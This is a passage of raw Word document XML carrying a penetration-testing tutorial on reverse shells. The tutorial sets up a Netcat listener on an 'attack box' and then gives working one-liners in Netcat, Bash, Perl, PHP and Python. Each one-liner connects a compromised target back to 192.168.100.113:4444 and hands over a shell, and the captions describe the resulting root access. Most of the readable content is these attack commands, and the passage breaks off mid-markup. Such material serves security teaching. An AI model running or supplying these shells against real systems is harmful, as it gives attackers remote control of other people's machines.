          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Setup a Netcat listener.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57541051" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="630"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Connect to the Netcat listener from the target host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F02CADE" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="630"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Issue commands on the target host from the attack box.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="392D7F84"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First we setup a Netcat listener on the attack box which is listening on port 4444 with the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2181AEC4" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>nc –lvp 4444</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071A5772"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Than we issue the following command on the target host to connect to our attack box (remember we have remote code execution on this box):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18995369"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For Linux:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D218FF4" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>nc 192.168.100.113 4444 –e /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B9C4EF2"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For Windows:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568D6272" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>nc.exe 192.168.100.113 4444 –e cmd.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090682AA"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On the attack box we now have a bash shell on the target host and we have full control over this box in the context of the account which initiated the reverse shell. In this case the root user initiated the shell which means we have root privileges on the target host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59CF5FAA" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0"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noProof/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41B5A482" wp14:editId="7074D5BB">
            <wp:extent cx="7099300" cy="4591050"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="33" name="Picture 33" descr="Netcat basics - Reverse sh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etcat basics - Reverse she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099300" cy="4591050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0395E789" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:right="450"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="606569"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="606569"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>An example of a Netcat reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E02007"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The top window with the green console text is the target host and the lower console is the attack box. As we can see we have root access from attacker 192.168.100.113 on target host 192.168.100.107.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39397B4B" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="360" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="2"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="19232D"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="19232D"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Reverse shell without Netcat on the target host</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D3BC269"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One major downside on the shown example is that you need Netcat on that target host which is very often not the case in real world scenario’s. In some cases Netcat is present, or we have a way to install it, but in many cases we need to use alternatives ways to connect back to the attack box. Let’s have a look at a few alternative ways to setup a reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289E3201" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="19232D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="19232D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bash reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57F10D94"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With can also use Bash to initiate a reverse shell from the target host to the attack box by using the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A2CFF7" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>bash -i &gt;&amp; /dev/tcp/192.168.100.113/4444 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62111178" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0"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noProof/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4D386437" wp14:editId="0769606F">
            <wp:extent cx="7080250" cy="3854450"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="34" name="Picture 34" descr="Netcat basics - Reverse shell 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tcat basics - Reverse shell bash"/>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080250" cy="3854450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D80129" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:right="450"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="606569"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="606569"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>An example of a Bash reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B15032"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As we can see Netcat on that attack box also accepts a bash reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5E60E3" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="19232D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="19232D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Perl reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B7AC52"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If Perl is present on that remote host we can also initiate a reverse shell using Perl. Run the following command on the target host to setup the reverse shell:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695AA70B" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>perl -e ‘use Socket;$i=”192.168.100.113″;$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”&gt;&amp;S”);open(STDOUT,”&gt;&amp;S”);open(STDERR,”&gt;&amp;S”);exec(“/bin/sh -i”);};’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C7485B" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0"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noProof/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="70A53C9E" wp14:editId="0E135F61">
            <wp:extent cx="7105650" cy="3530600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="35" name="Picture 35" descr="Netcat basics - Reverse shell pe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tcat basics - Reverse shell per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105650" cy="3530600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="592FB275" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:right="450"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="606569"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="606569"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>An example of a Perl reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15DE25D2" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="19232D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="19232D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>PHP reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065DB1AC"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When PHP is present on the compromised host, which is often the case on webservers, it is a great alternative to Netcat, Perl and Bash. Let’s run the following code to use PHP for the reverse shell to the attack box:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5375D8CB" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>php -r ‘$sock=fsockopen(“192.168.100.113”,4444);exec(“/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3”);’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0ABE42"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As we can see this reverse shell one liner also returns a /bin/sh shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1631D401" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0"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noProof/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="183EC7F5" wp14:editId="3B89D2ED">
            <wp:extent cx="7118350" cy="3816350"/>
            <wp:effectExtent l="0" t="0" r="6350" b="0"/>
            <wp:docPr id="36" name="Picture 36" descr="PHP reverse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HP reverse shel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18350" cy="3816350"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="109EDEBE" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:right="450"/>
        <w:jc w:val="center"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="606569"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="606569"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>An example of a PHP reverse shell.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D3D13A" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="19232D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="19232D"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Python reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0E6C60"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Python is also a very commonly installed language on Linux machines. The following command issues a reverse shell using Python:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A604B3B" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="inherit" w:eastAsia="Times New Roman" w:hAnsi="inherit" w:cs="Arial"/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.100.113”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3304A7" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0"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noProof/>
          <w:color w:val="606569"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
